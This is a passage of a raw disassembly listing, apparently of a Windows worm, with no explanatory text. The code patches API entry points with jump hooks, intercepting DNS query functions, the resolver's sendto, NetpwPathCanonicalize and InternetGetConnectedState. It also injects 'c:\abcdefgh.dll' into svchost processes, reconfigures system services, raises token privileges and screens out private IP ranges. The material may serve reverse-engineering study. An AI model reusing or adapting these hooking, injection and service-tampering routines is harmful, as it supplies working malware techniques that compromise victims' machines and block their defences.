mov esp, [ebp+ms_exc.old_esp]
loc_9A5554: ; CODE XREF: sub_9A54F9+20�j
; sub_9A54F9+3D�j ...
or [ebp+ms_exc.disabled], 0FFFFFFFFh
xor eax, eax
inc eax
mov ecx, [ebp+var_1C]
xor ecx, ebp
call sub_9AAAC1
call __SEH_epilog
retn
sub_9A54F9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9A556B proc near ; DATA XREF: sub_9A5B4D+36�o
arg_0 = dword ptr 8
push ebp
mov ebp, esp
cmp dword_9BB2F8, 0
jz short loc_9A558E
mov ecx, [ebp+arg_0]
call sub_9A54F9
test eax, eax
jnz short loc_9A558E
mov eax, dword_9BB2F8
add eax, 4
pop ebp
jmp eax
; ---------------------------------------------------------------------------
loc_9A558E: ; CODE XREF: sub_9A556B+A�j
; sub_9A556B+16�j
push 5B4h ; dwErrCode
call SetLastError
mov eax, 5B4h
pop ebp
retn 18h
sub_9A556B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9A55A2 proc near ; CODE XREF: .text:009A5630�p
var_120 = dword ptr -120h
First = byte ptr -11Ch
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
push 110h
push offset stru_9A28E0
call __SEH_prolog
mov eax, dword_9B8788
xor eax, ebp
mov [ebp+var_1C], eax
xor eax, eax
mov [ebp+var_120], eax
mov [ebp+ms_exc.disabled], eax
cmp ecx, eax
jz short loc_9A5609
mov ecx, [ecx]
cmp ecx, eax
jz short loc_9A5609
push eax ; lpUsedDefaultChar
push eax ; lpDefaultChar
push 100h ; cbMultiByte
lea edx, [ebp+First]
push edx ; lpMultiByteStr
push 0FFFFFFFFh ; cchWideChar
push ecx ; lpWideCharStr
push eax ; dwFlags
push eax ; CodePage
call WideCharToMultiByte
test eax, eax
jz short loc_9A5609
lea eax, [ebp+First]
push eax ; lpFirst
call sub_9A3FB6
pop ecx
mov [ebp+var_120], eax
jmp short loc_9A5609
; ---------------------------------------------------------------------------
loc_9A5602: ; DATA XREF: .text:stru_9A28E0�o
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_9A5606: ; DATA XREF: .text:stru_9A28E0�o
mov esp, [ebp+ms_exc.old_esp]
loc_9A5609: ; CODE XREF: sub_9A55A2+26�j
; sub_9A55A2+2C�j ...
or [ebp+ms_exc.disabled], 0FFFFFFFFh
mov eax, [ebp+var_120]
mov ecx, [ebp+var_1C]
xor ecx, ebp
call sub_9AAAC1
call __SEH_epilog
retn
sub_9A55A2 endp
; ---------------------------------------------------------------------------
loc_9A5623: ; DATA XREF: sub_9A5B4D+4D�o
cmp dword_9BB2FC, 0
jz short loc_9A5643
mov ecx, [esp+4]
call sub_9A55A2
test eax, eax
jnz short loc_9A5643
mov eax, dword_9BB2FC
add eax, 4
jmp eax
; ---------------------------------------------------------------------------
loc_9A5643: ; CODE XREF: .text:009A562A�j
; .text:009A5637�j
push 5B4h
call SetLastError
mov eax, 5B4h
retn 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9A5656 proc near ; CODE XREF: sub_9A58BD+12�p
; sub_9A58F0+2C�p
var_248 = dword ptr -248h
var_244 = dword ptr -244h
Dst = dword ptr -240h
var_22C = dword ptr -22Ch
var_228 = dword ptr -228h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push 238h
push offset stru_9A28F0
call __SEH_prolog
mov eax, dword_9B8788
xor eax, ebp
mov [ebp+var_1C], eax
xor ebx, ebx
mov [ebp+var_244], ebx
mov [ebp+ms_exc.disabled], ebx
call GetCurrentProcessId
push eax ; th32ProcessID
push 8 ; dwFlags
call CreateToolhelp32Snapshot
mov edi, eax
mov [ebp+var_248], edi
cmp edi, 0FFFFFFFFh
jz short loc_9A570F
mov esi, 224h
push esi ; Size
push ebx ; Val
lea eax, [ebp+Dst]
push eax ; Dst
call memset
add esp, 0Ch
mov [ebp+Dst], esi
lea eax, [ebp+Dst]
push eax ; lpme
push edi ; hSnapshot
call Module32First
jmp short loc_9A56FB
; ---------------------------------------------------------------------------
loc_9A56C0: ; CODE XREF: sub_9A5656+A7�j
mov eax, [ebp+var_22C]
cmp [ebp+arg_0], eax
jb short loc_9A56EE
mov ecx, [ebp+var_228]
add ecx, eax
cmp [ebp+arg_0], ecx
jnb short loc_9A56EE
cmp [ebp+arg_4], ebx
jz short loc_9A56E2
cmp eax, [ebp+arg_4]
jnz short loc_9A56EE
loc_9A56E2: ; CODE XREF: sub_9A5656+85�j
mov [ebp+var_244], 1
jmp short loc_9A56FF
; ---------------------------------------------------------------------------
loc_9A56EE: ; CODE XREF: sub_9A5656+73�j
; sub_9A5656+80�j ...
lea eax, [ebp+Dst]
push eax ; lpme
push edi ; hSnapshot
call Module32Next
loc_9A56FB: ; CODE XREF: sub_9A5656+68�j
test eax, eax
jnz short loc_9A56C0
loc_9A56FF: ; CODE XREF: sub_9A5656+96�j
push edi ; hObject
call CloseHandle
jmp short loc_9A570F
; ---------------------------------------------------------------------------
loc_9A5708: ; DATA XREF: .text:stru_9A28F0�o
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_9A570C: ; DATA XREF: .text:stru_9A28F0�o
mov esp, [ebp+ms_exc.old_esp]
loc_9A570F: ; CODE XREF: sub_9A5656+3D�j
; sub_9A5656+B0�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
mov eax, [ebp+var_244]
mov ecx, [ebp+var_1C]
xor ecx, ebp
call sub_9AAAC1
call __SEH_epilog
retn
sub_9A5656 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9A5729 proc near ; CODE XREF: sub_9A57C1+7A�p
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push 18h
push offset stru_9A2900
call __SEH_prolog
xor edi, edi
mov [ebp+var_24], edi
mov [ebp+ms_exc.disabled], edi
mov esi, [ebp+arg_0]
add esi, 0Ch
mov [ebp+var_1C], esi
loc_9A5746: ; CODE XREF: sub_9A5729+95�j
mov [ebp+var_20], edi
loc_9A5749: ; CODE XREF: sub_9A5729+8B�j
cmp edi, [ebp+arg_C]
jnb short loc_9A5762
mov al, [esi]
test al, al
jnz short loc_9A5774
mov [ebp+var_24], 1
mov eax, [ebp+arg_8]
mov byte ptr [edi+eax], 0
loc_9A5762: ; CODE XREF: sub_9A5729+23�j
; sub_9A5729+5D�j ...
or [ebp+ms_exc.disabled], 0FFFFFFFFh
call nullsub_3
mov eax, [ebp+var_24]
call __SEH_epilog
retn
; ---------------------------------------------------------------------------
loc_9A5774: ; CODE XREF: sub_9A5729+29�j
movsx ebx, al
mov [ebp+var_28], ebx
inc esi
mov [ebp+var_1C], esi
mov eax, esi
sub eax, [ebp+arg_0]
cmp eax, [ebp+arg_4]
jnb short loc_9A5762
push ebx ; Size
push esi ; Src
mov eax, [ebp+arg_8]
add eax, edi
push eax ; Dst
call memcpy
add esp, 0Ch
add esi, ebx
mov [ebp+var_1C], esi
add edi, ebx
mov [ebp+var_20], edi
cmp edi, [ebp+arg_C]
jnb short loc_9A5762
mov eax, esi
sub eax, [ebp+arg_0]
cmp eax, [ebp+arg_4]
jnb short loc_9A5762
cmp byte ptr [esi], 0
jz short loc_9A5749
mov eax, [ebp+arg_8]
mov byte ptr [edi+eax], 2Eh
inc edi
jmp short loc_9A5746
sub_9A5729 endp
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_3. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9A57C1 proc near ; CODE XREF: sub_9A58BD+23�p
var_12C = dword ptr -12Ch
var_128 = dword ptr -128h
var_124 = dword ptr -124h
First = byte ptr -120h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
push 11Ch
push offset stru_9A2910
call __SEH_prolog
mov eax, dword_9B8788
xor eax, ebp
mov [ebp+var_1C], eax
mov esi, edx
xor edi, edi
mov [ebp+ms_exc.disabled], edi
mov [ebp+var_128], esi
mov al, [esi+2]
test al, 78h
jnz loc_9A58A9
test al, 1
jz loc_9A58A9
cmp [esi+6], di
jnz loc_9A58A9
cmp [esi+8], di
jnz loc_9A58A9
cmp [esi+0Ah], di
jnz loc_9A58A9
cmp byte ptr [esi+ecx-5], 0
jnz loc_9A58A9
cmp dword ptr [esi+ecx-4], 1000100h
jnz short loc_9A58A9
push 104h
lea eax, [ebp+First]
push eax
push ecx
push esi
call sub_9A5729
add esp, 10h
test eax, eax
jz short loc_9A58A9
lea eax, [ebp+First]
push eax ; lpFirst
call sub_9A3FB6
pop ecx
test eax, eax
jz short loc_9A58A9
lea eax, [ebp+First]
push eax ; Str
call strlen
pop ecx
mov ebx, eax
mov [ebp+var_12C], ebx
mov [ebp+var_124], edi
loc_9A5873: ; CODE XREF: sub_9A57C1+DA�j
cmp [ebp+var_124], ebx
jnb short loc_9A589D
call rand
xor edx, edx
push 1Ah
pop ecx
div ecx
add edx, 61h
mov eax, [ebp+var_124]
mov [esi+eax+0Dh], dl
inc [ebp+var_124]
jmp short loc_9A5873
; ---------------------------------------------------------------------------
loc_9A589D: ; CODE XREF: sub_9A57C1+B8�j
mov [esi+0Ch], bl
jmp short loc_9A58A9
; ---------------------------------------------------------------------------
loc_9A58A2: ; DATA XREF: .text:stru_9A2910�o
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_9A58A6: ; DATA XREF: .text:stru_9A2910�o
mov esp, [ebp+ms_exc.old_esp]
loc_9A58A9: ; CODE XREF: sub_9A57C1+2B�j
; sub_9A57C1+33�j ...
or [ebp+ms_exc.disabled], 0FFFFFFFFh
mov ecx, [ebp+var_1C]
xor ecx, ebp
call sub_9AAAC1
call __SEH_epilog
retn
sub_9A57C1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9A58BD proc near ; DATA XREF: sub_9A5BCD+16�o
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
cmp [ebp+arg_8], 12h
jl short loc_9A58E5
push dword_9BB308
push dword ptr [ebp+4]
call sub_9A5656
test eax, eax
pop ecx
pop ecx
jz short loc_9A58E5
mov ecx, [ebp+arg_8]
mov edx, [ebp+arg_4]
call sub_9A57C1
loc_9A58E5: ; CODE XREF: sub_9A58BD+7�j
; sub_9A58BD+1B�j
mov eax, dword_9BB300
add eax, 4
pop ebp
jmp eax
sub_9A58BD endp
; =============== S U B R O U T I N E =======================================
sub_9A58F0 proc near ; DATA XREF: sub_9A58F0+2�o
; sub_9A5C69+1�o
xor eax, eax
cmp eax, offset sub_9A58F0
jnz short loc_9A58FD
inc eax
retn 8
; ---------------------------------------------------------------------------
loc_9A58FD: ; CODE XREF: sub_9A58F0+7�j
mov eax, dword_9BB0CC
test eax, eax
mov ecx, [esp+0]
jz short loc_9A5919
cmp ecx, eax
jb short loc_9A5919
mov edx, dword_9BB0D0
add edx, eax
cmp ecx, edx
jb short loc_9A592E
loc_9A5919: ; CODE XREF: sub_9A58F0+17�j
; sub_9A58F0+1B�j
push 0
push ecx
call sub_9A5656
test eax, eax
pop ecx
pop ecx
jnz short loc_9A592E
push eax ; dwExitCode
call ExitThread
; ---------------------------------------------------------------------------
loc_9A592E: ; CODE XREF: sub_9A58F0+27�j
; sub_9A58F0+35�j
mov eax, dword_9BB304
add eax, 4
jmp eax
sub_9A58F0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9A5938(void *Dst)
sub_9A5938 proc near ; CODE XREF: sub_9A5A91+59�p
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
flOldProtect = dword ptr -38h
var_34 = dword ptr -34h
nPriority = dword ptr -30h
hThread = dword ptr -2Ch
lpAddress = dword ptr -28h
Src = byte ptr -24h
var_23 = dword ptr -23h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
Dst = dword ptr 8
push 38h
push offset stru_9A2920
call __SEH_prolog
mov eax, dword_9B8788
xor eax, ebp
mov [ebp+var_1C], eax
mov ebx, ecx
mov [ebp+lpAddress], ebx
mov edi, edx
mov esi, [ebp+Dst]
and [ebp+var_34], 0
call GetCurrentThread
mov [ebp+hThread], eax
push eax ; hThread
call GetThreadPriority
mov [ebp+nPriority], eax
and [ebp+ms_exc.disabled], 0
push 2Ch ; Size
push 0 ; Val
push esi ; Dst
call memset
add esp, 0Ch
mov [esi+28h], edi
mov [esi+24h], ebx
mov [ebp+var_3C], ebx
xor ebx, ebx
mov [ebp+var_44], ebx
mov [ebp+var_48], 5
loc_9A5995: ; CODE XREF: sub_9A5938+AC�j
cmp ebx, 5
jge short loc_9A59F1
mov eax, [ebp+var_3C]
add eax, ebx
push eax
call sub_9AA660
mov [ebp+var_40], eax
lea ecx, [esi+ebx+4]
push eax ; Size
mov eax, [ebp+var_3C]
add eax, ebx
push eax ; Src
push ecx ; Dst
call memcpy
add esp, 10h
mov al, [esi+ebx+4]
mov cl, al
and cl, 0FEh
cmp cl, 0E8h
jz short loc_9A59E6
cmp al, 0FFh
jnz short loc_9A59DA
mov al, [esi+ebx+5]
cmp al, 25h
jz short loc_9A59E6
cmp al, 15h
jz short loc_9A59E6
loc_9A59DA: ; CODE XREF: sub_9A5938+94�j
mov eax, [ebp+var_40]
add ebx, eax
mov [esi], ebx
mov [ebp+var_44], ebx
jmp short loc_9A5995
; ---------------------------------------------------------------------------
loc_9A59E6: ; CODE XREF: sub_9A5938+90�j
; sub_9A5938+9C�j ...
or [ebp+ms_exc.disabled], 0FFFFFFFFh
xor eax, eax
jmp loc_9A5A81
; ---------------------------------------------------------------------------
loc_9A59F1: ; CODE XREF: sub_9A5938+60�j
lea eax, [esi+ebx]
mov byte ptr [eax+4], 0E9h
mov edx, [esi]
sub edx, esi
sub edx, ebx
mov ecx, [ebp+lpAddress]
lea edx, [edx+ecx-9]
mov [eax+5], edx
lea eax, [ebp+flOldProtect]
push eax ; lpflOldProtect
push 40h ; flNewProtect
push dword ptr [esi] ; dwSize
push ecx ; lpAddress
mov ebx, VirtualProtect
call ebx ; VirtualProtect
test eax, eax
jz short loc_9A5A7A
mov [ebp+Src], 0E9h
sub edi, [ebp+lpAddress]
sub edi, 5
mov [ebp+var_23], edi
push 0Fh ; nPriority
push [ebp+hThread] ; hThread
mov edi, SetThreadPriority
call edi ; SetThreadPriority
push 5 ; Size
lea eax, [ebp+Src]
push eax ; Src
push [ebp+lpAddress] ; Dst
call memcpy
add esp, 0Ch
push [ebp+nPriority] ; nPriority
push [ebp+hThread] ; hThread
call edi ; SetThreadPriority
lea eax, [ebp+flOldProtect]
push eax ; lpflOldProtect
push [ebp+flOldProtect] ; flNewProtect
push dword ptr [esi] ; dwSize
push [ebp+lpAddress] ; lpAddress
call ebx ; VirtualProtect
mov [ebp+var_34], 1
jmp short loc_9A5A7A
; ---------------------------------------------------------------------------
loc_9A5A67: ; DATA XREF: .text:stru_9A2920�o
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_9A5A6B: ; DATA XREF: .text:stru_9A2920�o
mov esp, [ebp+ms_exc.old_esp]
push [ebp+nPriority] ; nPriority
push [ebp+hThread] ; hThread
call SetThreadPriority
loc_9A5A7A: ; CODE XREF: sub_9A5938+E3�j
; sub_9A5938+12D�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
mov eax, [ebp+var_34]
loc_9A5A81: ; CODE XREF: sub_9A5938+B4�j
mov ecx, [ebp+var_1C]
xor ecx, ebp
call sub_9AAAC1
call __SEH_epilog
retn
sub_9A5938 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9A5A91(LPCSTR lpLibFileName,LPCSTR lpProcName,int)
sub_9A5A91 proc near ; CODE XREF: sub_9A5B0F+15�p
; sub_9A5B2E+15�p ...
var_4 = dword ptr -4
lpLibFileName = dword ptr 8
lpProcName = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
and [ebp+var_4], 0
test esi, esi
jz short loc_9A5B0B
cmp dword ptr [esi], 0
jnz short loc_9A5B0B
push [ebp+lpLibFileName] ; lpModuleName
call GetModuleHandleA
test eax, eax
jnz short loc_9A5ABC
push [ebp+lpLibFileName] ; lpLibFileName
call LoadLibraryA
test eax, eax
jz short loc_9A5B06
loc_9A5ABC: ; CODE XREF: sub_9A5A91+1C�j
push edi
push [ebp+lpProcName] ; lpProcName
push eax ; hModule
call GetProcAddress
mov edi, eax
test edi, edi
jz short loc_9A5B05
push 40h ; flProtect
push 103000h ; flAllocationType
push 2Ch ; dwSize
push 0 ; lpAddress
call VirtualAlloc
test eax, eax
mov [esi], eax
jz short loc_9A5B05
mov edx, [ebp+arg_8]
push eax ; Dst
mov ecx, edi
call sub_9A5938
test eax, eax
pop ecx
mov [ebp+var_4], eax
jnz short loc_9A5B05
push 8000h ; dwFreeType
push eax ; dwSize
push dword ptr [esi] ; lpAddress
call VirtualFree
loc_9A5B05: ; CODE XREF: sub_9A5A91+3A�j
; sub_9A5A91+51�j ...
pop edi
loc_9A5B06: ; CODE XREF: sub_9A5A91+29�j
mov eax, [ebp+var_4]
leave
retn
; ---------------------------------------------------------------------------
loc_9A5B0B: ; CODE XREF: sub_9A5A91+A�j
; sub_9A5A91+F�j
xor eax, eax
leave
retn
sub_9A5A91 endp
; =============== S U B R O U T I N E =======================================
sub_9A5B0F proc near ; CODE XREF: sub_9A3C63+1C3�p
; sub_9A3C63+1F1�p
push esi
push offset sub_9A52FE ; int
push offset aNetpwpathcanon ; "NetpwPathCanonicalize"
push offset dword_9A292C ; lpLibFileName
mov esi, offset dword_9BB2E8
call sub_9A5A91
add esp, 0Ch
pop esi
retn
sub_9A5B0F endp
; =============== S U B R O U T I N E =======================================
sub_9A5B2E proc near ; CODE XREF: sub_9A3C63+25�p
push esi
push offset sub_9A535E ; int
push offset aNtqueryinforma ; "NtQueryInformationProcess"
push offset aNtdll_dll ; "ntdll.dll"
mov esi, offset dword_9BB2EC
call sub_9A5A91
add esp, 0Ch
pop esi
retn
sub_9A5B2E endp
; =============== S U B R O U T I N E =======================================
sub_9A5B4D proc near ; CODE XREF: sub_9A3C63+206�p
var_4 = dword ptr -4
push ecx
push ebx
push ebp
push esi
push edi
push offset sub_9A53E9 ; int
push offset aDnsquery_a ; "DnsQuery_A"
mov edi, offset aDnsapi_dll ; "dnsapi.dll"
push edi ; lpLibFileName
mov esi, offset dword_9BB2F0
call sub_9A5A91
push offset sub_9A54C1 ; int
push offset aDnsquery_utf8 ; "DnsQuery_UTF8"
push edi ; lpLibFileName
mov esi, offset dword_9BB2F4
mov ebx, eax
call sub_9A5A91
push offset sub_9A556B ; int
push offset aDnsquery_w ; "DnsQuery_W"
push edi ; lpLibFileName
mov esi, offset dword_9BB2F8
mov ebp, eax
call sub_9A5A91
push offset loc_9A5623 ; int
push offset aQuery_main ; "Query_Main"
push edi ; lpLibFileName
mov esi, offset dword_9BB2FC
mov [esp+44h+var_4], eax
call sub_9A5A91
xor eax, eax
add esp, 30h
cmp ebx, eax
jz short loc_9A5BC7
cmp ebp, eax
jz short loc_9A5BC7
cmp [esp+14h+var_4], eax
jz short loc_9A5BC7
inc eax
loc_9A5BC7: ; CODE XREF: sub_9A5B4D+6D�j
; sub_9A5B4D+71�j ...
pop edi
pop esi
pop ebp
pop ebx
pop ecx
retn
sub_9A5B4D endp
; =============== S U B R O U T I N E =======================================
sub_9A5BCD proc near ; CODE XREF: sub_9A3C63+1C8�p
push offset ModuleName ; "dnsrslvr.dll"
call GetModuleHandleA
test eax, eax
mov dword_9BB308, eax
jnz short loc_9A5BE2
retn
; ---------------------------------------------------------------------------
loc_9A5BE2: ; CODE XREF: sub_9A5BCD+12�j
push esi
push offset sub_9A58BD ; int
push offset aSendto ; "sendto"
push offset aWs2_32_dll ; "ws2_32.dll"
mov esi, offset dword_9BB300
call sub_9A5A91
add esp, 0Ch
pop esi
retn
sub_9A5BCD endp
; =============== S U B R O U T I N E =======================================
sub_9A5C01 proc near ; CODE XREF: StartAddress:loc_9A3B78�p
push esi
xor esi, esi
loc_9A5C04: ; CODE XREF: sub_9A5C01+21�j
push offset aSvchost_exeKNe ; "svchost.exe -k NetworkService"
call sub_9A66EF
test eax, eax
pop ecx
jnz short loc_9A5C26
push 3E8h ; dwMilliseconds
call Sleep
inc esi
cmp esi, 14h
jl short loc_9A5C04
pop esi
retn
; ---------------------------------------------------------------------------
loc_9A5C26: ; CODE XREF: sub_9A5C01+10�j
push offset FileName ; "c:\\abcdefgh.dll"
push eax ; dwProcessId
call sub_9A642B
pop ecx
pop ecx
pop esi
retn
sub_9A5C01 endp
; =============== S U B R O U T I N E =======================================
sub_9A5C35 proc near ; CODE XREF: StartAddress+8C�p
push esi
xor esi, esi
loc_9A5C38: ; CODE XREF: sub_9A5C35+21�j
push offset aServ ; "servÈ!"
call sub_9A638D
test eax, eax
pop ecx
jnz short loc_9A5C5A
push 3E8h ; dwMilliseconds
call Sleep
inc esi
cmp esi, 14h
jl short loc_9A5C38
pop esi
retn
; ---------------------------------------------------------------------------
loc_9A5C5A: ; CODE XREF: sub_9A5C35+10�j
push offset FileName ; "c:\\abcdefgh.dll"
push eax ; dwProcessId
call sub_9A642B
pop ecx
pop ecx
pop esi
retn
sub_9A5C35 endp
; =============== S U B R O U T I N E =======================================
sub_9A5C69 proc near ; CODE XREF: StartAddress:loc_9A3B56�p
push esi
push offset sub_9A58F0 ; int
push offset aInternetgetc_0 ; "InternetGetConnectedState"
push offset aWininet_dll ; "wininet.dll"
mov esi, offset dword_9BB304
call sub_9A5A91
add esp, 0Ch
pop esi
retn
sub_9A5C69 endp
; =============== S U B R O U T I N E =======================================
sub_9A5C88 proc near ; CODE XREF: sub_9A4033+7�p
; sub_9A857A+1E9�p
arg_0 = dword ptr 4
mov ecx, [esp+arg_0]
xor eax, eax
mov edx, ecx
and edx, 0FFFFh
inc eax
cmp edx, 0A8C0h
jz short loc_9A5CB2
cmp cl, 0Ah
jz short loc_9A5CB2
and ecx, 0F0FFh
cmp ecx, 10ACh
jnz short locret_9A5CB4
loc_9A5CB2: ; CODE XREF: sub_9A5C88+15�j
; sub_9A5C88+1A�j
xor eax, eax
locret_9A5CB4: ; CODE XREF: sub_9A5C88+28�j
retn
sub_9A5C88 endp
; =============== S U B R O U T I N E =======================================
sub_9A5CB5 proc near ; CODE XREF: sub_9A857A+1DA�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
mov ecx, esi
and ecx, 0FFh
xor eax, eax
cmp ecx, 7Fh
jz short loc_9A5D18
test ecx, ecx
jz short loc_9A5D18
mov ecx, esi
and ecx, 0FFFFh
cmp ecx, 0FEA9h
jz short loc_9A5D18
mov ecx, esi
and ecx, 0FEFFh
cmp ecx, 12C6h
jz short loc_9A5D18
mov ecx, esi
and ecx, 0FFFFFFh
cmp ecx, 0FFFFFDh
jz short loc_9A5D18
mov ecx, esi
mov edx, 0F0h
and ecx, edx
cmp ecx, 0E0h
jz short loc_9A5D18
cmp ecx, edx
jz short loc_9A5D18
cmp esi, 0FFFFFFFFh
jz short loc_9A5D18
inc eax
loc_9A5D18: ; CODE XREF: sub_9A5CB5+12�j
; sub_9A5CB5+16�j ...
pop esi
retn
sub_9A5CB5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9A5D1A proc near ; CODE XREF: sub_9A3715+4D�p
; sub_9A394B+4E�p ...
PerformanceCount= LARGE_INTEGER ptr -8
push ebp
mov ebp, esp
push ecx
push ecx
push esi
push edi
call GetCurrentThreadId
mov esi, eax
call GetCurrentProcessId
mov edi, eax
lea eax, [ebp+PerformanceCount]
push eax ; lpPerformanceCount
call QueryPerformanceCounter
test eax, eax
jnz short loc_9A5D49
and dword ptr [ebp+PerformanceCount+4], eax
mov dword ptr [ebp+PerformanceCount], 4362AEB0h
loc_9A5D49: ; CODE XREF: sub_9A5D1A+23�j
call GetTickCount
xor eax, dword ptr [ebp+PerformanceCount]
xor eax, edi
xor eax, esi
push eax ; Seed
call srand
pop ecx
pop edi
pop esi
leave
retn
sub_9A5D1A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9A5D62(LPCSTR lpServiceName)
sub_9A5D62 proc near ; CODE XREF: sub_9A39CF+7�p
; sub_9A39CF+13�p ...
ServiceStatus = _SERVICE_STATUS ptr -24h
hSCObject = dword ptr -8
var_4 = dword ptr -4
lpServiceName = dword ptr 8
push ebp
mov ebp, esp
sub esp, 24h
push esi
xor esi, esi
push 0F003Fh ; dwDesiredAccess
push esi ; lpDatabaseName
push esi ; lpMachineName
mov [ebp+var_4], esi
call OpenSCManagerA
cmp eax, esi
mov [ebp+hSCObject], eax
jz short loc_9A5DF4
push ebx
push edi
push 20027h ; dwDesiredAccess
push [ebp+lpServiceName] ; lpServiceName
push eax ; hSCManager
call OpenServiceA
mov ebx, CloseServiceHandle
mov edi, eax
cmp edi, esi
jz short loc_9A5DED
lea eax, [ebp+ServiceStatus]
push eax ; lpServiceStatus
push edi ; hService
call QueryServiceStatus
test eax, eax
jz short loc_9A5DD3
cmp [ebp+ServiceStatus.dwCurrentState], 1
jz short loc_9A5DD3
lea eax, [ebp+ServiceStatus]
push eax ; lpServiceStatus
push 1 ; dwControl
push edi ; hService
call ControlService
cmp eax, esi
mov [ebp+var_4], eax
jz short loc_9A5DD3
push 0FA0h ; dwMilliseconds
call Sleep
loc_9A5DD3: ; CODE XREF: sub_9A5D62+4A�j
; sub_9A5D62+50�j ...
push esi ; lpDisplayName
push esi ; lpPassword
push esi ; lpServiceStartName
push esi ; lpDependencies
push esi ; lpdwTagId
push esi ; lpLoadOrderGroup
push esi ; lpBinaryPathName
push 0FFFFFFFFh ; dwErrorControl
push 4 ; dwStartType
push 0FFFFFFFFh ; dwServiceType
push edi ; hService
call ChangeServiceConfigA
or [ebp+var_4], eax
push edi ; hSCObject
call ebx ; CloseServiceHandle
loc_9A5DED: ; CODE XREF: sub_9A5D62+3B�j
push [ebp+hSCObject] ; hSCObject
call ebx ; CloseServiceHandle
pop edi
pop ebx
loc_9A5DF4: ; CODE XREF: sub_9A5D62+1E�j
mov eax, [ebp+var_4]
pop esi
leave
retn
sub_9A5D62 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9A5DFA(LPCSTR lpName,int)
sub_9A5DFA proc near ; CODE XREF: sub_9A3C63+4A�p
; sub_9A6E36+B�p
NewState = _TOKEN_PRIVILEGES ptr -14h
hObject = dword ptr -4
lpName = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 14h
push edi
lea eax, [ebp+hObject]
push eax ; TokenHandle
push 28h ; DesiredAccess
xor edi, edi
call GetCurrentProcess
push eax ; ProcessHandle
call OpenProcessToken
test eax, eax
jz short loc_9A5E60
mov eax, [ebp+arg_4]
neg eax
sbb eax, eax
and eax, 2
mov [ebp+NewState.Privileges.Attributes], eax
lea eax, [ebp+NewState.Privileges]
push eax ; lpLuid
push [ebp+lpName] ; lpName
mov [ebp+NewState.PrivilegeCount], 1
push edi ; lpSystemName
call LookupPrivilegeValueA
test eax, eax
jz short loc_9A5E57
push edi ; ReturnLength
push edi ; PreviousState
push 10h ; BufferLength
lea eax, [ebp+NewState]
push eax ; NewState
push edi ; DisableAllPrivileges
push [ebp+hObject] ; TokenHandle
call AdjustTokenPrivileges
test eax, eax
jz short loc_9A5E57
inc edi
loc_9A5E57: ; CODE XREF: sub_9A5DFA+44�j
; sub_9A5DFA+5A�j
push [ebp+hObject] ; hObject
call CloseHandle
loc_9A5E60: ; CODE XREF: sub_9A5DFA+1E�j
mov eax, edi
pop edi
leave
retn
sub_9A5DFA endp
; =============== S U B R O U T I N E =======================================
sub_9A5E65 proc near ; CODE XREF: sub_9A3715+48�p
; sub_9A394B+46�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
mov ebx, [esp+4+arg_0]
push esi
push edi
mov edi, [esp+0Ch+arg_4]
xor esi, esi
test edi, edi
jle short loc_9A5E8D
loc_9A5E76: ; CODE XREF: sub_9A5E65+26�j
call rand
push 1Ah
cdq
pop ecx
idiv ecx
add dl, 61h
mov [esi+ebx], dl
inc esi
cmp esi, edi
jl short loc_9A5E76
loc_9A5E8D: ; CODE XREF: sub_9A5E65+F�j
mov byte ptr [ebx+edi], 0
pop edi
pop esi
pop ebx
retn
sub_9A5E65 endp
; =============== S U B R O U T I N E =======================================
sub_9A5E95 proc near ; CODE XREF: sub_9A7E0F+97�p
; sub_9A7E0F+12E�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
mov ebx, [esp+4+arg_0]
push esi
push edi
mov edi, [esp+0Ch+arg_4]
xor esi, esi
test edi, edi
jle short loc_9A5EBE
loc_9A5EA6: ; CODE XREF: sub_9A5E95+27�j
call rand
push 1Ah
cdq
pop ecx
idiv ecx
add edx, 61h
mov [ebx+esi*2], dx
inc esi
cmp esi, edi
jl short loc_9A5EA6
loc_9A5EBE: ; CODE XREF: sub_9A5E95+F�j
and word ptr [ebx+edi*2], 0
pop edi
pop esi
pop ebx
retn
sub_9A5E95 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=0A8h
; int __cdecl sub_9A5EC7(int,HANDLE hFile)
